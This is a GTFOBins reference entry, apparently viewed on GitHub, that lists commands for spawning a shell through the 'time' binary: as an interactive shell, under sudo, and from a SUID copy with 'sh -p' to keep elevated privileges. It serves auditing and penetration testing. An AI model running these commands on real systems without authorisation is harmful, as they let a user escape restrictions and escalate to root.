GTFOBins.github.io/_gtfobins/time.md

13 lines
340 B
Markdown
Raw Normal View History

---
description: |
Note that the shell might have its own builtin time implementation, which may
2018-06-04 17:21:24 +02:00
behave differently than` /usr/bin/time`, hence the absolute path.
functions:
execute-interactive:
- code: /usr/bin/time /bin/sh
sudo-enabled:
- code: sudo /usr/bin/time /bin/sh
suid-enabled:
- code: ./time /bin/sh -p
---